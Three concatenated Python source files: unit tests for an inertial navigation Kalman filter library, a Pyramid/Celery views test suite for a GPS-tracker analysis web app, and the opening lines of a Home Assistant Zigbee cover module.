    assert_equal(len(s.states), 0)
    assert_equal(s.P.shape, (0, 0))
    assert_equal(s.q.shape, (0,))
    assert_equal(s.F.shape, (0, 0))
    assert_equal(s.G.shape, (0, 0))
    assert_equal(s.output_matrix().shape, (3, 0))
    # Bias with random walk: 3 states, P = bias^2 * I, q = bias_walk.
    s = InertialSensor(bias=0.1, bias_walk=0.2)
    assert_equal(s.n_states, 3)
    assert_equal(s.n_noises, 3)
    assert_equal(list(s.states.keys()), ['BIAS_1', 'BIAS_2', 'BIAS_3'])
    assert_equal(list(s.states.values()), [0, 1, 2])
    assert_allclose(s.P, 0.01 * np.identity(3))
    assert_equal(s.q, [0.2, 0.2, 0.2])
    assert_equal(s.F, np.zeros((3, 3)))
    assert_equal(s.G, np.identity(3))
    assert_equal(s.output_matrix(), np.identity(3))
    # Scale-factor errors: output matrix is the diagonal of the readings.
    s = InertialSensor(scale=0.2, scale_walk=0.3)
    assert_equal(s.n_states, 3)
    assert_equal(s.n_noises, 3)
    assert_equal(list(s.states.keys()), ['SCALE_1', 'SCALE_2', 'SCALE_3'])
    assert_equal(list(s.states.values()), [0, 1, 2])
    assert_allclose(s.P, 0.04 * np.identity(3))
    assert_equal(s.q, [0.3, 0.3, 0.3])
    assert_equal(s.F, np.zeros((3, 3)))
    assert_equal(s.G, np.identity(3))
    assert_equal(s.output_matrix([1, 2, 3]), np.diag([1, 2, 3]))
    # A batch of readings yields a stack of diagonal output matrices.
    assert_equal(s.output_matrix([[1, -2, 2], [0.1, 2, 0.5]]),
                 np.array((np.diag([1, -2, 2]), np.diag([0.1, 2, 0.5]))))
    # Exponentially correlated noise: F = -I / corr_time and
    # q = corr_sd * sqrt(2 / corr_time).
    s = InertialSensor(corr_sd=0.1, corr_time=5)
    assert_equal(s.n_states, 3)
    assert_equal(s.n_noises, 3)
    assert_equal(list(s.states.keys()), ['CORR_1', 'CORR_2', 'CORR_3'])
    assert_equal(list(s.states.values()), [0, 1, 2])
    assert_allclose(s.P, 0.01 * np.identity(3))
    q = 0.1 * (2 / 5) ** 0.5
    assert_equal(s.q, [q, q, q])
    assert_allclose(s.F, -np.identity(3) / 5)
    assert_equal(s.G, np.identity(3))
    # All three sources combined: states ordered BIAS, SCALE, CORR.
    s = InertialSensor(bias=0.1, bias_walk=0.2, scale=0.3, scale_walk=0.4,
                       corr_sd=0.5, corr_time=10)
    assert_equal(s.n_states, 9)
    assert_equal(s.n_noises, 9)
    assert_equal(list(s.states.keys()),
                 ['BIAS_1', 'BIAS_2', 'BIAS_3', 'SCALE_1', 'SCALE_2',
                  'SCALE_3', 'CORR_1', 'CORR_2', 'CORR_3'])
    assert_equal(list(s.states.values()), np.arange(9))
    assert_allclose(s.P, np.diag([0.01, 0.01, 0.01, 0.09, 0.09, 0.09,
                                  0.25, 0.25, 0.25]))
    q_corr = 0.5 * (2 / 10) ** 0.5
    assert_equal(s.q, [0.2, 0.2, 0.2, 0.4, 0.4, 0.4, q_corr, q_corr, q_corr])
    assert_allclose(s.F, np.diag([0, 0, 0, 0, 0, 0, -1/10, -1/10, -1/10]))
    assert_equal(s.G, np.identity(9))
    # Combined output matrix: identity for bias, diag(readings) for scale,
    # identity for the correlated term.
    H = s.output_matrix([1, 2, 3])
    assert_allclose(H, [[1, 0, 0, 1, 0, 0, 1, 0, 0],
                        [0, 1, 0, 0, 2, 0, 0, 1, 0],
                        [0, 0, 1, 0, 0, 3, 0, 0, 1]])
    H = s.output_matrix([[1, 2, 3], [-1, 2, 0.5]])
    assert_allclose(H[0], [[1, 0, 0, 1, 0, 0, 1, 0, 0],
                           [0, 1, 0, 0, 2, 0, 0, 1, 0],
                           [0, 0, 1, 0, 0, 3, 0, 0, 1]])
    assert_allclose(H[1], [[1, 0, 0, -1, 0, 0, 1, 0, 0],
                           [0, 1, 0, 0, 2, 0, 0, 1, 0],
                           [0, 0, 1, 0, 0, 0.5, 0, 0, 1]])
def test_LatLonObs():
    """Latitude/longitude observation: returns None off-stamp, and the
    expected innovation, measurement matrix and covariance on-stamp."""
    traj_point = pd.Series(
        data={'lat': 40, 'lon': 30, 'VE': 4, 'VN': -3, 'h': 15, 'p': 0,
              'r': 0})
    obs_data = pd.DataFrame(data={'lat': [40.0001], 'lon': [30.0002]},
                            index=[50])
    obs = LatLonObs(obs_data, 10)
    # A stamp absent from the observation index yields no measurement.
    assert_(obs.compute_obs(55, traj_point) is None)
    z, H, R = obs.compute_obs(50, traj_point)
    # Innovation is the position difference expressed in meters.
    z_true = [np.deg2rad(-0.0002) * earth.R0 * np.cos(np.deg2rad(40)),
              np.deg2rad(-0.0001) * earth.R0]
    assert_allclose(z, z_true, rtol=1e-5)
    assert_allclose(H, [[1, 0, 0, 0, 0, 0, 0],
                        [0, 1, 0, 0, 0, 0, 0]])
    # Covariance is sd**2 = 10**2 on both axes.
    assert_allclose(R, [[100, 0], [0, 100]])
def test_VeVnObs():
    """Velocity observation: returns None off-stamp, and the expected
    innovation and measurement matrix on-stamp."""
    traj_point = pd.Series(
        data={'lat': 40, 'lon': 30, 'VE': 4, 'VN': -3, 'h': 15, 'p': 0,
              'r': 0})
    obs_data = pd.DataFrame(data={'VE': [3], 'VN': [-2]}, index=[50])
    obs = VeVnObs(obs_data, 10)
    # A stamp absent from the observation index yields no measurement.
    assert_(obs.compute_obs(55, traj_point) is None)
    z, H, R = obs.compute_obs(50, traj_point)
    # Innovation is the velocity difference (traj minus observation).
    assert_allclose(z, [1, -1])
    assert_allclose(H, [[0, 0, 1, 0, 0, 0, -2],
                        [0, 0, 0, 1, 0, 0, -3]])
def test_refine_stamps():
    """Stamps must come back deduplicated, sorted and padded so that no
    gap between consecutive stamps exceeds the maximum step."""
    refined = _refine_stamps([2, 2, 5, 1, 10, 20], 2)
    assert_equal(refined, [1, 2, 4, 5, 7, 9, 10, 12, 14, 16, 18, 20])
def test_kalman_correct():
    """Sanity-check the Kalman correction step against hand-computed
    values for a diagonal 2-state system, with and without gain scaling
    and with an adaptive gain curve."""
    # As the implementation of standard Kalman correction formulas is
    # straightforward we use a sanity check, when the correct answer is
    # computed without complete formulas.
    P0 = np.array([[2, 0], [0, 1]], dtype=float)
    x0 = np.array([0, 0], dtype=float)
    z = np.array([1, 2])
    R = np.array([[3, 0], [0, 2]])
    H = np.identity(2)
    # Diagonal system: each state corrects independently, so the posterior
    # mean/covariance follow the scalar Kalman formulas per component.
    x_true = np.array([1 * 2 / (2 + 3), 2 * 1 / (1 + 2)])
    P_true = np.diag([1 / (1/2 + 1/3), 1 / (1/1 + 1/2)])
    x = x0.copy()
    P = P0.copy()
    _kalman_correct(x, P, z, H, R, None, None)
    assert_allclose(x, x_true)
    assert_allclose(P, P_true)
    # Same correction with per-component gain factors [1/2, 1/3]; the
    # covariance then follows the Joseph form with the scaled gains.
    x = x0.copy()
    P = P0.copy()
    _kalman_correct(x, P, z, H, R, np.array([1 / 2, 1 / 3]), None)
    x_true = np.array([1 * 2 / (2 + 3) / 2, 2 * 1 / (1 + 2) / 3])
    K1 = 0.4 * 1 / 2
    K2 = 1 / 3 * 1 / 3
    P_true = np.diag([(1 - K1)**2 * 2 + K1**2 * 3,
                      (1 - K2)**2 * 1 + K2**2 * 2])
    assert_allclose(x, x_true)
    assert_allclose(P, P_true)
    # Adaptive gain: a piecewise curve of the normalized innovation q
    # (parameters L, F, C) scales the gain instead of fixed factors.
    def create_gain_curve(params):
        L, F, C = params
        def gain_curve(q):
            if q > C:
                return 0
            if F < q <= C:
                return L * F * (C - q) / ((C - F) * q)
            elif L < q <= F:
                return L
            else:
                return q
        return gain_curve
    curve = create_gain_curve([0.5, 1, 5])
    x = x0.copy()
    P = P0.copy()
    _kalman_correct(x, P, z, H, R, None, curve)
    # Expected gains hand-derived for this z, P0, R and the curve above.
    K1 = 0.4 * 0.5 / (23 / 30)**0.5
    K2 = 1/3 * 0.5 / (23 / 30)**0.5
    P_true = np.diag([(1 - K1)**2 * 2 + K1**2 * 3,
                      (1 - K2)**2 * 1 + K2**2 * 2])
    assert_allclose(x, [K1 * z[0], K2 * z[1]])
    assert_allclose(P, P_true)
def test_propagate_errors():
    """Compare linearized error propagation against the true error from
    integrating a trajectory with perturbed initial conditions and biased
    sensors; relative deviations must stay within 10%."""
    # This test is complex and hardly a unit test, but it is strong.
    # I believe it's better than a formal test.
    dt = 0.5
    t = 6 * 3600
    n_samples = int(t / dt)
    # Static reference trajectory with constant attitude.
    lat = np.full(n_samples, 50.0)
    lon = np.full(n_samples, 60.0)
    alt = np.zeros_like(lat)
    h = np.full(n_samples, 10.0)
    r = np.full(n_samples, -5.0)
    p = np.full(n_samples, 3.0)
    traj, gyro, accel = sim.from_position(dt, lat, lon, alt, h, p, r)
    # Inject constant sensor biases (increments, hence the * dt).
    gyro_bias = np.array([1e-8, -2e-8, 3e-8])
    accel_bias = np.array([3e-3, -4e-3, 2e-3])
    gyro += gyro_bias * dt
    accel += accel_bias * dt
    theta, dv = coning_sculling(gyro, accel)
    # Initial condition perturbations.
    d_lat = 100
    d_lon = -200
    d_VE = 1
    d_VN = -2
    d_h = 0.01
    d_p = -0.02
    d_r = 0.03
    lat0, lon0 = perturb_ll(traj.lat[0], traj.lon[0], d_lat, d_lon)
    VE0 = traj.VE[0] + d_VE
    VN0 = traj.VN[0] + d_VN
    h0 = traj.h[0] + d_h
    p0 = traj.p[0] + d_p
    r0 = traj.r[0] + d_r
    # True error: integrate from the perturbed state and difference.
    traj_c = integrate(dt, lat0, lon0, VE0, VN0, h0, p0, r0, theta, dv)
    error_true = traj_diff(traj_c, traj)
    error_linear = propagate_errors(dt, traj, d_lat, d_lon, d_VE, d_VN, d_h,
                                    d_p, d_r, gyro_bias, accel_bias)
    # Compare relative to the average error magnitude.
    error_scale = np.mean(np.abs(error_true))
    rel_diff = (error_linear - error_true) / error_scale
    assert_allclose(rel_diff.lat, 0, atol=0.1)
    assert_allclose(rel_diff.lon, 0, atol=0.1)
    assert_allclose(rel_diff.VE, 0, atol=0.1)
    assert_allclose(rel_diff.VN, 0, atol=0.1)
    assert_allclose(rel_diff.h, 0, atol=0.1)
    assert_allclose(rel_diff.p, 0, atol=0.1)
    assert_allclose(rel_diff.r, 0, atol=0.1)
def test_FeedforwardFilter():
    """Feedforward filter on a static bench: estimated INS errors must
    track the true propagated errors after convergence, and the smoother
    must track them over the whole interval."""
    # Test that the results are reasonable on a static bench.
    dt = 1
    traj = pd.DataFrame(index=np.arange(1 * 3600))
    traj['lat'] = 50
    traj['lon'] = 60
    traj['VE'] = 0
    traj['VN'] = 0
    traj['h'] = 0
    traj['p'] = 0
    traj['r'] = 0
    np.random.seed(1)
    # Noisy position observations every 10 samples, sd = 10 m.
    obs_data = pd.DataFrame(
        index=traj.index[::10],
        data={
            'lat': traj.lat[::10],
            'lon': traj.lon[::10]
        }
    )
    obs_data['lat'], obs_data['lon'] = perturb_ll(
        obs_data.lat, obs_data.lon,
        10 * np.random.randn(obs_data.shape[0]),
        10 * np.random.randn(obs_data.shape[0]))
    obs = LatLonObs(obs_data, 10)
    d_lat = 5
    d_lon = -3
    d_VE = 1
    d_VN = -1
    d_h = 0.1
    d_p = 0.03
    d_r = -0.02
    errors = propagate_errors(dt, traj, d_lat, d_lon, d_VE, d_VN,
                              d_h, d_p, d_r)
    traj_error = correct_traj(traj, -errors)
    f = FeedforwardFilter(dt, traj, 5, 1, 0.2, 0.05)
    res = f.run(traj_error, [obs])
    # Skip the initial transient; compare only the converged estimates.
    x = errors.loc[3000:]
    y = res.err.loc[3000:]
    assert_allclose(x.lat, y.lat, rtol=0, atol=10)
    assert_allclose(x.lon, y.lon, rtol=0, atol=10)
    assert_allclose(x.VE, y.VE, rtol=0, atol=1e-2)
    # Fix: VN was previously checked as a duplicated VE assertion.
    assert_allclose(x.VN, y.VN, rtol=0, atol=1e-2)
    assert_allclose(x.h, y.h, rtol=0, atol=1.5e-3)
    assert_allclose(x.p, y.p, rtol=0, atol=1e-4)
    assert_allclose(x.r, y.r, rtol=0, atol=1e-4)
    # Fix: abs() must wrap the residuals, not the boolean comparison.
    assert_(np.all(np.abs(res.residuals[0]) < 4))
    res = f.run_smoother(traj_error, [obs])
    # This smoother we don't need to wait until the filter converges,
    # the estimation accuracy is also improved some
    x = errors
    y = res.err
    assert_allclose(x.lat, y.lat, rtol=0, atol=10)
    assert_allclose(x.lon, y.lon, rtol=0, atol=10)
    assert_allclose(x.VE, y.VE, rtol=0, atol=1e-2)
    assert_allclose(x.VN, y.VN, rtol=0, atol=1e-2)
    assert_allclose(x.h, y.h, rtol=0, atol=1.5e-3)
    assert_allclose(x.p, y.p, rtol=0, atol=1e-4)
    assert_allclose(x.r, y.r, rtol=0, atol=1e-4)
    assert_(np.all(np.abs(res.residuals[0]) < 4))
def test_FeedbackFilter():
    """Feedback filter on a static bench: after convergence the corrected
    trajectory must match the reference, both for the filter and the
    smoother."""
    dt = 0.9
    traj = pd.DataFrame(index=np.arange(1 * 3600))
    traj['lat'] = 50
    traj['lon'] = 60
    traj['VE'] = 0
    traj['VN'] = 0
    traj['h'] = 0
    traj['p'] = 0
    traj['r'] = 0
    _, gyro, accel = sim.from_position(dt, traj.lat, traj.lon,
                                       np.zeros_like(traj.lat),
                                       h=traj.h, p=traj.p, r=traj.r)
    theta, dv = coning_sculling(gyro, accel)
    np.random.seed(0)
    # Noisy position observations every 10 samples, sd = 10 m.
    obs_data = pd.DataFrame(
        index=traj.index[::10],
        data={
            'lat': traj.lat[::10],
            'lon': traj.lon[::10]
        }
    )
    obs_data['lat'], obs_data['lon'] = perturb_ll(
        obs_data.lat, obs_data.lon,
        10 * np.random.randn(obs_data.shape[0]),
        10 * np.random.randn(obs_data.shape[0]))
    obs = LatLonObs(obs_data, 10)
    f = FeedbackFilter(dt, 5, 1, 0.2, 0.05)
    # Start integration from a perturbed initial state.
    d_lat = 5
    d_lon = -3
    d_VE = 1
    d_VN = -1
    d_h = 0.1
    d_p = 0.03
    d_r = -0.02
    lat0, lon0 = perturb_ll(50, 60, d_lat, d_lon)
    integrator = Integrator(dt, lat0, lon0, d_VE, d_VN, d_h, d_p, d_r)
    res = f.run(integrator, theta, dv, observations=[obs])
    error = traj_diff(res.traj, traj)
    # Skip the initial transient; compare only the converged estimates.
    error = error.iloc[3000:]
    assert_allclose(error.lat, 0, rtol=0, atol=10)
    assert_allclose(error.lon, 0, rtol=0, atol=10)
    assert_allclose(error.VE, 0, rtol=0, atol=1e-2)
    assert_allclose(error.VN, 0, rtol=0, atol=1e-2)
    assert_allclose(error.h, 0, rtol=0, atol=1.5e-3)
    assert_allclose(error.p, 0, rtol=0, atol=1e-4)
    assert_allclose(error.r, 0, rtol=0, atol=1e-4)
    # Fix: abs() must wrap the residuals, not the boolean comparison.
    assert_(np.all(np.abs(res.residuals[0]) < 4))
    res = f.run_smoother(integrator, theta, dv, [obs])
    error = traj_diff(res.traj, traj)
    assert_allclose(error.lat, 0, rtol=0, atol=10)
    assert_allclose(error.lon, 0, rtol=0, atol=10)
    assert_allclose(error.VE, 0, rtol=0, atol=1e-2)
    assert_allclose(error.VN, 0, rtol=0, atol=1e-2)
    assert_allclose(error.h, 0, rtol=0, atol=1.5e-3)
    assert_allclose(error.p, 0, rtol=0, atol=1e-4)
    assert_allclose(error.r, 0, rtol=0, atol=1e-4)
    assert_(np.all(np.abs(res.residuals[0]) < 4))
if __name__ == '__main__':
    # Allow running this test module directly via numpy's test runner.
    run_module_suite()
|
|
# Copyright 2013 Netherlands eScience Center
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from mock import Mock, patch
from pyramid import testing
from pyramid.exceptions import HTTPNotFound
from pyramid.response import FileResponse
from celery.result import AsyncResult
from script_wrapper.tasks import PythonTask
from script_wrapper.tasks.gpsvis_db import GpsVisDB as TaskMadeByResearcher
from script_wrapper.tasks.calendar import Calendar as TaskMadeByDeveloper
from script_wrapper.validation import Invalid
from script_wrapper.views import Views, TaskNotReady
class TestViews(unittest.TestCase):
    """Tests for script_wrapper.views.Views: task lookup and listing, job
    submission, state reporting, result rendering, file serving, DB
    metadata queries and task revocation."""

    def setUp(self):
        """Create a Pyramid test configuration and a dummy request."""
        self.settings = {'task_output_directory': '/tmp/results', }
        self.config = testing.setUp(settings=self.settings)
        self.request = testing.DummyRequest()

    def tearDown(self):
        """Tear down the Pyramid test configuration."""
        testing.tearDown()

    def test_scriptid(self):
        self.request.matchdict = {'script': 'plot'}
        views = Views(self.request)
        self.assertEqual(views.scriptid, 'plot')

    def test_tasks_made_by_anyone(self):
        views = Views(self.request)
        taskMadeByResearcher = TaskMadeByResearcher()
        taskMadeByDeveloper = TaskMadeByDeveloper()
        views.celery.tasks = {
            'plot': taskMadeByResearcher,
            'kml': taskMadeByDeveloper,
            'celery.chain': 'celery.chain object',
        }
        tasks = views.tasks()
        # Internal celery entries (celery.chain) must be filtered out.
        expected_tasks = {
            'plot': taskMadeByResearcher,
            'kml': taskMadeByDeveloper,
        }
        self.assertEqual(tasks, expected_tasks)

    def test_tasks_made_by_researcher(self):
        views = Views(self.request)
        taskMadeByResearcher = TaskMadeByResearcher()
        taskMadeByDeveloper = TaskMadeByDeveloper()
        views.celery.tasks = {
            'plot': taskMadeByResearcher,
            'kml': taskMadeByDeveloper,
            'celery.chain': 'celery.chain object',
        }
        tasks = views.tasks(made_by_researcher=True)
        expected_tasks = {
            'plot': taskMadeByResearcher,
        }
        self.assertEqual(tasks, expected_tasks)

    def test_task(self):
        self.request.matchdict = {'script': 'plot'}
        views = Views(self.request)
        views.celery.tasks = {'plot': 'task1'}
        self.assertEqual(views.task(), 'task1')

    def test_task_invalidtaskname_notfound(self):
        self.request.matchdict = {'script': 'plotblablabla'}
        views = Views(self.request)
        with self.assertRaises(HTTPNotFound):
            views.task()

    def test_taskid(self):
        self.request.matchdict = {'taskid': 'b3c84d96-4dc7-4532-a864-3573202f202a'}
        views = Views(self.request)
        self.assertEqual(views.taskid, 'b3c84d96-4dc7-4532-a864-3573202f202a')

    def test_task_result(self):
        self.request.matchdict['taskid'] = 'b3c84d96-4dc7-4532-a864-3573202f202a'
        views = Views(self.request)
        mresult = Mock(AsyncResult)
        is_ready = True
        mresult.ready.return_value = is_ready
        views.celery.AsyncResult.return_value = mresult
        result = views.task_result()
        self.assertEqual(result, mresult)

    def test_task_result_must_be_ready(self):
        self.request.matchdict['taskid'] = 'b3c84d96-4dc7-4532-a864-3573202f202a'
        views = Views(self.request)
        mresult = Mock(AsyncResult)
        is_ready = True
        mresult.ready.return_value = is_ready
        views.celery.AsyncResult.return_value = mresult
        result = views.task_result(True)
        self.assertEqual(result, mresult)

    def test_task_result_must_be_ready_but_isnt(self):
        self.request.matchdict['taskid'] = 'b3c84d96-4dc7-4532-a864-3573202f202a'
        views = Views(self.request)
        mresult = Mock(AsyncResult)
        is_ready = False
        mresult.ready.return_value = is_ready
        views.celery.AsyncResult.return_value = mresult
        with self.assertRaises(TaskNotReady):
            views.task_result(True)

    def test_index(self):
        views = Views(self.request)
        taskMadeByResearcher = TaskMadeByResearcher()
        taskMadeByDeveloper = TaskMadeByDeveloper()
        views.celery.tasks = {
            'plot': taskMadeByResearcher,
            'kml': taskMadeByDeveloper,
            'celery.chain': 'celery.chain object',
        }
        result = views.index()
        # The index page only lists tasks made by researchers.
        expected_tasks = {
            'plot': taskMadeByResearcher,
        }
        self.assertEqual(result, {'tasks': expected_tasks})

    def test_form(self):
        self.request.matchdict['script'] = 'plot'
        views = Views(self.request)
        views.celery.tasks = {'plot': 'task1'}
        result = views.form()
        self.assertEqual(result, {'task': 'task1'})

    def test_jsform(self):
        from tempfile import NamedTemporaryFile
        formjs = NamedTemporaryFile(suffix='.js')
        task = PythonTask()
        task.js_form_location = Mock(return_value=formjs.name)
        self.request.matchdict['script'] = 'plot'
        views = Views(self.request)
        views.celery.tasks = {'plot': task}
        result = views.jsform()
        self.assertIsInstance(result, FileResponse)
        self.assertEqual(result.content_type, 'application/javascript')
        formjs.close()

    @patch('script_wrapper.views.db_url_from_request')
    def test_submit(self, dr):
        dr.return_value = 'sqlite:///'
        self.config.add_route('result', '/{taskid}')
        self.request.matchdict['script'] = 'plot'
        self.request.json_body = 1234
        task = Mock(PythonTask)
        task_result = Mock(AsyncResult)
        task_result.id = 'b3c84d96-4dc7-4532-a864-3573202f202a'
        task.apply_async.return_value = task_result
        views = Views(self.request)
        views.celery.tasks = {'plot': task}
        result = views.submit()
        eresult = {'success': True,
                   'result': '/b3c84d96-4dc7-4532-a864-3573202f202a',
                   }
        self.assertEqual(result, eresult)
        task.formfields2taskargs.assert_called_with(1234, 'sqlite:///')

    @patch('script_wrapper.views.db_url_from_request')
    def test_submit_InvalidQuery(self, dr):
        dr.return_value = 'sqlite:///'
        self.request.matchdict['script'] = 'plot'
        self.request.json_body = 1234
        task = Mock(PythonTask)
        task.formfields2taskargs.side_effect = Invalid('Invalid query')
        views = Views(self.request)
        views.celery.tasks = {'plot': task}
        result = views.submit()
        eresult = {'success': False,
                   'msg': 'Invalid query'}
        self.assertEqual(result, eresult)

    @patch('script_wrapper.views.db_url_from_request')
    def test_submit_InvalidQueryField(self, dr):
        dr.return_value = 'sqlite:///'
        self.request.matchdict['script'] = 'kmzgen'
        self.request.json_body = {'shape': 'triangle'}
        task = Mock(PythonTask)
        import colander
        shape = colander.SchemaNode(colander.String(),
                                    name='shape',
                                    validator=colander.OneOf(['circle', 'iarrow', 'tarrow']))
        exception = colander.Invalid(shape, '"triangle" is not one of circle, iarrow, tarrow')
        task.formfields2taskargs.side_effect = exception
        views = Views(self.request)
        views.celery.tasks = {'kmzgen': task}
        result = views.submit()
        # Colander validation errors are reported per field.
        eresult = {'success': False,
                   'errors': {'shape': '"triangle" is not one of circle, iarrow, tarrow'},
                   }
        self.assertEqual(result, eresult)

    def test_statejson(self):
        self.config.add_route('result', '/{script}/{taskid}')
        self.request.matchdict['script'] = 'plot'
        self.request.matchdict['taskid'] = 'b3c84d96-4dc7-4532-a864-3573202f202a'
        views = Views(self.request)
        task_result = Mock(AsyncResult)
        task_result.id = 'b3c84d96-4dc7-4532-a864-3573202f202a'
        task_result.state = 'PENDING'
        task_result.ready.return_value = False
        task_result.successful.return_value = False
        task_result.failed.return_value = False
        views.celery.AsyncResult = Mock(return_value=task_result)
        result = views.statejson()
        result_url = '/plot/b3c84d96-4dc7-4532-a864-3573202f202a'
        expected_result = {'state': 'PENDING',
                           'ready': False,
                           'success': False,
                           'failure': False,
                           'result': result_url}
        self.assertDictEqual(result, expected_result)

    def test_statehtml(self):
        result_url = '/plot/b3c84d96-4dc7-4532-a864-3573202f202a'
        state = {'state': 'PENDING',
                 'success': False,
                 'failure': False,
                 'ready': False,
                 'result': result_url,
                 'task': 'pythontask',
                 }
        self.request.matchdict['script'] = 'plot'
        views = Views(self.request)
        views.statejson = Mock(return_value=state)
        views.celery.tasks = {'plot': 'pythontask'}
        result = views.statehtml()
        self.assertDictEqual(result, state)

    @patch('os.listdir')
    def test_result(self, listdir):
        # Fix: the route pattern must carry the {filename} placeholder so
        # generated file URLs (asserted below) include the file name.
        self.config.add_route('result_file', '/{script}/{taskid}/{filename}')
        self.request.matchdict['script'] = 'plot'
        self.request.matchdict['taskid'] = 'mytaskid'
        views = Views(self.request)
        task_result = Mock(AsyncResult)
        task_result.id = 'mytaskid'
        task_result.ready.return_value = True
        task_result.failed.return_value = False
        views.celery.AsyncResult = Mock(return_value=task_result)
        task = PythonTask()
        task.name = 'plot'
        views.celery.tasks = {'plot': task}
        listdir.return_value = ['stderr.txt', 'stdout.txt']
        result = views.result()
        eresult = {'result': task_result,
                   'files': {'stderr.txt': '/plot/mytaskid/stderr.txt',
                             'stdout.txt': '/plot/mytaskid/stdout.txt',
                             },
                   'task': task,
                   'result_html': None,
                   }
        self.assertEqual(result, eresult)
        listdir.assert_called_with('/tmp/results/mytaskid')

    @patch('os.listdir')
    def test_result_nofiles(self, listdir):
        self.request.matchdict['script'] = 'plot'
        self.request.matchdict['taskid'] = 'mytaskid'
        views = Views(self.request)
        task_result = Mock(AsyncResult)
        task_result.ready.return_value = True
        task_result.failed.return_value = False
        views.celery.AsyncResult = Mock(return_value=task_result)
        task = PythonTask()
        task.name = 'plot'
        views.celery.tasks = {'plot': task}
        # A missing output directory must be handled as "no files".
        listdir.side_effect = OSError('[Errno 2] No such file or directory: /tmp/results/mytaskid')
        result = views.result()
        eresult = {'result': task_result,
                   'files': {},
                   'task': task,
                   'result_html': None,
                   }
        self.assertEqual(result, eresult)

    def test_result_template(self):
        self.request.matchdict['script'] = 'plot'
        self.request.matchdict['taskid'] = 'mytaskid'
        views = Views(self.request)
        task_result = Mock(AsyncResult)
        views.task_result = Mock(return_value=task_result)
        task = PythonTask()
        task.render_result = Mock(return_value='mytemplate')
        views.task = Mock(return_value=task)
        files = {'result.csv': '/plot/mytaskid/result.csv', }
        views.result_files = Mock(return_value=files)
        result = views.result()
        eresult = {'result': task_result,
                   'files': files,
                   'task': task,
                   'result_html': 'mytemplate',
                   }
        self.assertEqual(result, eresult)

    @patch('script_wrapper.views.FileResponse')
    def test_result_file(self, fileresponse):
        self.request.matchdict['script'] = 'plot'
        self.request.matchdict['taskid'] = 'mytaskid'
        self.request.matchdict['filename'] = 'stdout.txt'
        views = Views(self.request)
        task_result = Mock(AsyncResult)
        task_result.id = 'mytaskid'
        task_result.ready.return_value = True
        views.celery.AsyncResult = Mock(return_value=task_result)
        views.result_file()
        epath = '/tmp/results/mytaskid/stdout.txt'
        fileresponse.assert_called_with(epath, self.request)

    @patch('script_wrapper.views.make_session_from_request')
    def test_species(self, sm):
        session = Mock()
        mock_species = ['Lesser Black-backed Gull']
        config = {'return_value.query.return_value.distinct.return_value.order_by.return_value': mock_species}
        session.configure_mock(**config)
        sm.return_value = session
        views = Views(self.request)
        species = views.species()
        self.assertEqual(species, [{'id': 'Lesser Black-backed Gull',
                                    'text': 'Lesser Black-backed Gull',
                                    }])

    @patch('script_wrapper.views.make_session_from_request')
    def test_projects(self, sm):
        session = Mock()
        mock_projects = [('Project1')]
        config = {'return_value.query.return_value.distinct.return_value.order_by.return_value': mock_projects}
        session.configure_mock(**config)
        sm.return_value = session
        views = Views(self.request)
        projects = views.projects()
        self.assertEqual(projects, [{'id': 'Project1',
                                     'text': 'Project1',
                                     }])

    @patch('script_wrapper.views.make_session_from_request')
    def test_trackers(self, sm):
        session = Mock()
        mock_trackers = [(1, 'Project1', 'Lesser Black-backed Gull')]
        config = {'return_value.query.return_value.join.return_value.join.return_value.order_by.return_value.distinct.return_value': mock_trackers}
        session.configure_mock(**config)
        sm.return_value = session
        views = Views(self.request)
        trackers = views.trackers()
        self.assertEqual(trackers, [{'id': 1,
                                     'project': 'Project1',
                                     'species': 'Lesser Black-backed Gull',
                                     }])

    def test_revoke_task(self):
        self.request.matchdict['taskid'] = 'mytaskid'
        views = Views(self.request)
        task_result = Mock(AsyncResult)
        task_result.failed.return_value = False
        views.celery = Mock()
        views.celery.AsyncResult = Mock(return_value=task_result)
        result = views.revoke_task()
        # assertEqual: assertEquals is a deprecated alias (removed in 3.12).
        self.assertEqual(result, {'success': True})
        views.celery.AsyncResult.assert_called_with('mytaskid')
        task_result.revoke.assert_called_with(terminate=True)

    def test_tools(self):
        self.config.add_route('apply', '/tool/{script}/')
        views = Views(self.request)
        taskMadeByResearcher = TaskMadeByResearcher()
        taskMadeByDeveloper = TaskMadeByDeveloper()
        views.celery.tasks = {
            'plot': taskMadeByResearcher,
            'kml': taskMadeByDeveloper,
            'celery.chain': 'celery.chain object',
        }
        result = views.tools()
        expected = [{
            'label': 'Tracker Calendar',
            'form_url': '/tool/calendar/',
            'title': 'Calendar overview with daily statistics of GPS-tracker',
            'description': '''More information can be found <a target="_blank" href="https://public.e-ecology.sara.nl/wiki/index.php/Tracker_Calendar">here</a>.''',
            'made_by_researcher': False
        }, {
            'label': 'KMZ and Plot',
            'form_url': '/tool/gpsvis_db/',
            'title': 'Generate KMZ file and statistics plot',
            'description': '',
            'made_by_researcher': True
        }]
        self.assertEqual(result, expected)
|
|
"""Support for ZHA covers."""
from __future__ import annotations
import asyncio
import functools
import logging
from zigpy.zcl.foundation import Status
from homeassistant.components.cover import (
ATTR_CURRENT_POSITION,
ATTR_POSITION,
CoverDeviceClass,
CoverEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
STATE_CLOSED,
STATE_CLOSING,
STATE_OPEN,
STATE_OPENING,
Platform,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .core import discovery
from .core.const import (
CHANNEL_COVER,
CHANNEL_LEVEL,
CHANNEL_ON_OFF,
CHANNEL_SHADE,
DATA_ZHA,
SIGNAL_ADD_ENTITIES,
SIGNAL_ATTR_UPDATED,
SIGNAL_SET_LEVEL,
)
from .core.registries import ZHA_ENTITIES
from .core.typing import ChannelType, ZhaDeviceType
from .entity import ZhaEntity
_LOGGER = logging.getLogger(__name__)
MULTI_MATCH = functools.partial(ZHA_ENTITIES.multipass_match, Platform.COVER)
async def async_setup_entry(
    hass: HomeAssistant,
    config_entry: ConfigEntry,
    async_add_entities: AddEntitiesCallback,
) -> None:
    """Set up the Zigbee Home Automation cover from config entry."""
    entities_to_create = hass.data[DATA_ZHA][Platform.COVER]
